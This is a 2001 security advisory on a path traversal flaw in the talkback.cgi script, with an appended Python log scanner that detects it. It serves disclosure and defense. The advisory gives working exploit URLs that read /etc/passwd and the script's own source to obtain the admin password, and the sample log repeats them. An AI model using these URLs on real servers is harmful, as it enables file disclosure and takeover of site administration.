From: Stan (stanWHIZKUNDE.ORG)
Date: Mon Apr 09 2001 - 10:44:23 CDT


    [whizkunde security advisory: talkback (CGI)]
    http://www.whizkunde.org | stanwhizkunde.org

    ----------------------------------------------------------
    Release date: April 9th 2001
    Subject: talkback.cgi security problem
    Systems affected: UNIX systems running talkback CGI script
    Vendor: http://www.waytotheweb.com
    ----------------------------------------------------------

    1. problem
    Talkback.cgi may allow remote users (website visitors) to
    view any file on a webserver (depending on the user the
    webserver is running as).

    Consider this URL:

    http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
    ../../../../../../../../etc/passwd%00&action=view&matchview=1

    This will display /etc/passwd (if the webserver user has
    access to this file).

    Another URL can display the source of talkback.cgi itself
    that contains the admin password:

    http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
    ../cgi-bin/talkback.cgi%00&action=view&matchview=1

    (You might have to use another URL instead of
    ../cgi-bin/talkback.cgi%00, this depends on where the
    cgi-bin is installed.)

    In this file you can find $admin_password that can be used in

    http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

    to post & delete articles.

    2. fix
    Way To The Web has released an updated version of
    talkback.cgi that isn't vulnerable to this problem:

    http://www.waytotheweb.com/webscripts/talkback.htm

    ----------------------------------------------------------
    Stan a.k.a. ThePike
    stanwhizkunde.org
    http://www.whizkunde.org

    Copyright whizkunde security team 2001
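
Added example, not part of the original advisory: a log check that flags talkback.cgi requests whose decoded "article" parameter contains a NUL byte or a ".." path segment, the two markers visible in the URLs above. The Common Log Format layout, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a Common Log Format entry (assumed log layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def article_reasons(value):
    """Reasons a decoded 'article' value looks like file traversal."""
    reasons = []
    if "\x00" in value:                      # %00 used to cut off an appended suffix
        reasons.append("nul-byte")
    if ".." in re.split(r"[/\\]", value):    # whole '..' segment, not 'a..b'
        reasons.append("dot-dot-segment")
    if value.startswith("/"):
        reasons.append("absolute-path")
    return reasons

def scan_line(line):
    """Return the reasons for one log line, or None if it is not suspicious."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/talkback.cgi"):
        return None
    # parse_qs percent-decodes values, so %00 becomes a real NUL here.
    for value in parse_qs(url.query, keep_blank_values=True).get("article", []):
        reasons = article_reasons(value)
        if reasons:
            return reasons
    return None

def scan_log(lines):
    """Return [(line_number, reasons)] for every suspicious line."""
    hits = [(n, scan_line(line)) for n, line in enumerate(lines, 1)]
    return [(n, r) for n, r in hits if r]

# Constructed sample entries (documentation IP ranges, invented article ids).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Apr/2001:10:40:01 -0500] "GET /cgi-bin/talkback.cgi?article=1017&action=view&matchview=1 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [09/Apr/2001:10:41:17 -0500] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 200 1433',
    '198.51.100.7 - - [09/Apr/2001:10:41:52 -0500] "GET /cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1 HTTP/1.0" 200 20480',
    '192.0.2.22 - - [09/Apr/2001:10:43:09 -0500] "GET /cgi-bin/talkback.cgi?article=notes..2001&action=view HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for lineno, reasons in scan_log(SAMPLE_LOG):
        print(lineno, ",".join(reasons))
```

A hit on a request for the script's own source means $admin_password should be treated as disclosed and changed after upgrading.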